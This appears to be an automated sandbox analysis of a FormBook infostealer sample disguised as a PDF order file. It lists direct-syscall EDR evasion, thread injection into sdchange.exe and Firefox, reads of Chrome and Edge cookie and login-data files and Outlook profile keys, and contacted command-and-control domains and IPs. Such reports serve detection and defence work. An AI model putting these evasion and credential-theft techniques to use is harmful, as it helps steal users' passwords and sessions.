Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB97A9 mov eax, dword ptr fs:[00000030h] 4_2_32DB97A9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h] 4_2_32DBF7AF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h] 4_2_32DBF7AF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h] 4_2_32DBF7AF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h] 4_2_32DBF7AF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h] 4_2_32DBF7AF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D307AF mov eax, dword ptr fs:[00000030h] 4_2_32D307AF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D30750 mov eax, dword ptr fs:[00000030h] 4_2_32D30750
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72750 mov eax, dword ptr fs:[00000030h] 4_2_32D72750
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72750 mov eax, dword ptr fs:[00000030h] 4_2_32D72750
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB4755 mov eax, dword ptr fs:[00000030h] 4_2_32DB4755
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h] 4_2_32D43740
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h] 4_2_32D43740
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h] 4_2_32D43740
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6674D mov esi, dword ptr fs:[00000030h] 4_2_32D6674D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6674D mov eax, dword ptr fs:[00000030h] 4_2_32D6674D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6674D mov eax, dword ptr fs:[00000030h] 4_2_32D6674D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D38770 mov eax, dword ptr fs:[00000030h] 4_2_32D38770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h] 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E03749 mov eax, dword ptr fs:[00000030h] 4_2_32E03749
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h] 4_2_32D2B765
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h] 4_2_32D2B765
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h] 4_2_32D2B765
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h] 4_2_32D2B765
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D30710 mov eax, dword ptr fs:[00000030h] 4_2_32D30710
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D60710 mov eax, dword ptr fs:[00000030h] 4_2_32D60710
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6F71F mov eax, dword ptr fs:[00000030h] 4_2_32D6F71F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6F71F mov eax, dword ptr fs:[00000030h] 4_2_32D6F71F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37703 mov eax, dword ptr fs:[00000030h] 4_2_32D37703
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D35702 mov eax, dword ptr fs:[00000030h] 4_2_32D35702
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D35702 mov eax, dword ptr fs:[00000030h] 4_2_32D35702
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C700 mov eax, dword ptr fs:[00000030h] 4_2_32D6C700
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h] 4_2_32E0B73C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h] 4_2_32E0B73C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h] 4_2_32E0B73C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h] 4_2_32E0B73C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29730 mov eax, dword ptr fs:[00000030h] 4_2_32D29730
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29730 mov eax, dword ptr fs:[00000030h] 4_2_32D29730
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D65734 mov eax, dword ptr fs:[00000030h] 4_2_32D65734
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3973A mov eax, dword ptr fs:[00000030h] 4_2_32D3973A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3973A mov eax, dword ptr fs:[00000030h] 4_2_32D3973A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6273C mov eax, dword ptr fs:[00000030h] 4_2_32D6273C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6273C mov ecx, dword ptr fs:[00000030h] 4_2_32D6273C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6273C mov eax, dword ptr fs:[00000030h] 4_2_32D6273C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAC730 mov eax, dword ptr fs:[00000030h] 4_2_32DAC730
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF72E mov eax, dword ptr fs:[00000030h] 4_2_32DEF72E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D33720 mov eax, dword ptr fs:[00000030h] 4_2_32D33720
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h] 4_2_32D4F720
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h] 4_2_32D4F720
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h] 4_2_32D4F720
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF972B mov eax, dword ptr fs:[00000030h] 4_2_32DF972B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C720 mov eax, dword ptr fs:[00000030h] 4_2_32D6C720
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C720 mov eax, dword ptr fs:[00000030h] 4_2_32D6C720
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D304E5 mov ecx, dword ptr fs:[00000030h] 4_2_32D304E5
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E054DB mov eax, dword ptr fs:[00000030h] 4_2_32E054DB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DD94E0 mov eax, dword ptr fs:[00000030h] 4_2_32DD94E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B480 mov eax, dword ptr fs:[00000030h] 4_2_32D2B480

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\sdchange.exe Thread register set: target process: 4108 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\sdchange.exe Thread APC queued: target process: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe" Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403359

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562046 Sample: S#U0130PAR#U0130#U015e No.1... Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 33 www.vayui.top 2->33 35 officinadelpasso.shop 2->35 37 2 other IPs or domains 2->37 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 4 other signatures 2->53 10 S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe 40 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 31 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->31 dropped 13 S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe 6 10->13         started        process6 dnsIp7 43 enechado.ru.com 103.83.194.50, 49743, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States 13->43 65 Maps a DLL or memory area into another process 13->65 17 cXGDMXIloFhOE.exe 13->17 injected signatures8 process9 signatures10 45 Found direct / indirect Syscall (likely to bypass EDR) 17->45 20 sdchange.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 cXGDMXIloFhOE.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 39 officinadelpasso.shop 195.110.124.133, 49839, 80 REGISTER-ASIT Italy 23->39 41 www.vayui.top 104.21.95.160, 49875, 80 CLOUDFLARENETUS United States 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
